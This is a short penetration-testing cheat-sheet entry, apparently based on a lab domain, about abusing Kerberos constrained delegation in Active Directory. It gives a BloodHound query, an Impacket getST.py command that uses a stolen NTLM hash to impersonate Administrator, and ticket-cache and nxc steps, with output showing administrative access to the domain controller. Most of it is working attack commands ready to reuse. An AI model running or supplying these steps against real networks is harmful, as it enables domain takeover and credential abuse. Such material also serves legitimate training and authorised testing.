AD Delegation
AllowedToDelegate
Constrained Delegation Privileges
AllowedToDelegate (msds-allowedtodelegateto)
You can list constrained delegation with bloodhound.
MATCH p=()-[r:AllowedToDelegate]->() RETURN p
Open the source node and check the “Allowed To Delegate” SPN value
Then you can impersonate any user on that SPN, in our exampel the SPN is “www/dc.domain.htb”
cd /tmp/
unset KRB5CCNAME
rm *.ccache
getST.py -spn 'www/dc.domain.htb' -impersonate 'Administrator' -hashes ':4c395675187a74271de7c4af867ad417' 'domain.htb/compromised' -dc-ip 10.129.95.154
[...]
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@www_dc.domain.htb@DOMAIN.HTB.ccache
[...]
If you encounter time issue, you can sync with DC ntp
sudo rdate -n dc.domain.htb
Sometimes you can change the initial SPN to the one you want without problem
Using SMB will need the CIFS spn, and WINRM need WSMAN or HTTP.
mv *.ccache adminwww.ccache
export KRB5CCNAME="$(pwd)/adminwww.ccache"
klist "$KRB5CCNAME"
nxc smb dc.domain.htb --use-kcache
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:domain.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] domain.htb\Administrator from ccache (Pwn3d!)